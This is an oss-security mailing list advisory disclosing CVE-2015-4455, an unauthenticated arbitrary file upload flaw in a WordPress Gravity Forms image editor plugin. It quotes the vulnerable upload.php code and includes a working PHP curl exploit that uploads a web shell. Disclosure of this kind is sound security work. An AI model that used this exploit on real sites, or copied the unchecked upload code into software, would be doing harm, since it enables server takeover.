|
Message-id: <251ACF3F-8CEA-4A22-AB6E-35569598D2A0@me.com> Date: Wed, 10 Jun 2015 10:48:27 -0400 From: "Larry W. Cashdollar" <larry0@...com> To: Open Source Security <oss-security@...ts.openwall.com> Subject: Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin Title: Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin Author: Larry W. Cashdollar, @_larry0 Date: 2015-06-07 Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms Vendor: Waters Edge Web Design and NetherWorks LLC Vendor Notified: 2015-06-08 Advisory: http://www.vapid.dhs.org/advisory.php?v=125 Vendor Contact: plugins@...dpress.org Description: A plugin that integrates the awesome Adobe Creative SDK (formerly Aviary) Photo / Image Editor with the Gravity Forms Plugin. Vulnerability: There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php as an unauthenticated user can upload any file to the system. Including a .php file. The upload.php doesn't check that the user is authenticated and a simple post will allow arbitrary code to be uploaded to the server. In the file aviary-image-editor-add-on-for-gravity-forms/includes/upload.php the code doesn’t check for an authenticated Wordpress user: 1 <?php 2 3 $filename = $_SERVER["DOCUMENT_ROOT"]."/wp-load.php"; 4 if (file_exists($filename)) { 5 include_once($filename); 6 } else { 7 include_once("../../../../wp-load.php"); 8 } 9 echo "Here"; 10 $image_file = $_FILES['gf_aviary_file']; 11 if($image_file['name']!=''){ 12 $max_file_size = 4*1024*1024; 13 $file_size = intval($image_file['size']); 14 if( $file_size > $max_file_size ){ 15 $msg = "File Size is too big."; 16 $error_flag = true; 17 } 18 $extension = strtolower(end(explode('.', $image_file['name']))); 19 $aa_options = get_option('gf_aa_options'); 20 $supported_files = $aa_options['supported_file_format']; 21 $supported_files = strtolower($supported_files); 22 if(!$error_flag && $supported_files != '' ){ 23 $supported_files = explode (',', $supported_files); 24 if(!in_array($extension, $supported_files)){ 25 $msg = "No Supported file."; 26 $error_flag = true; 27 } 28 } 29 if(!$error_flag){ 30 $wp_upload_dir = wp_upload_dir(); 31 if(!is_dir($wp_upload_dir['basedir'].'/gform_aviary')){ 32 mkdir($wp_upload_dir['basedir'].'/gform_aviary'); 33 } 34 $upload_dir = $wp_upload_dir['basedir'].'/gform_aviary/'; 35 $upload_url = $wp_upload_dir['baseurl'].'/gform_aviary/'; 36 $file_name = $upload_dir.$_POST['gf_aviary_field_id'].'_'.$image_file['name' ]; 37 if(move_uploaded_file($image_file['tmp_name'], $file_name)){ 38 $file_url = $upload_url.$_POST['gf_aviary_field_id'].'_'.$image_file['na me']; 39 } 40 } 41 $return_obj = array('status' => 'success', 'message' => $file_url); 42 echo json_encode($return_obj); 43 } 44 ?> CVEID: 2015-4455 OSVDB: Exploit Code: • <?php • /*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */ • /*Larry W. Cashdollar @_larry0 • 6/7/2015 • shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php • */ • • • $target_url = 'http://www.vapidlabs.com/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/ • upload.php'; • $file_name_with_full_path = '/var/www/shell.php'; • • echo "POST to $target_url $file_name_with_full_path"; • $post = array('name' => 'shell.php','gf_aviary_file'=>'@...file_name_with_full_path); • • $ch = curl_init(); • curl_setopt($ch, CURLOPT_URL,$target_url); • curl_setopt($ch, CURLOPT_POST,1); • curl_setopt($ch, CURLOPT_POSTFIELDS, $post); • curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); • $result=curl_exec ($ch); • curl_close ($ch); • echo "<hr>"; • echo $result; • echo "<hr>"; • ?>
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.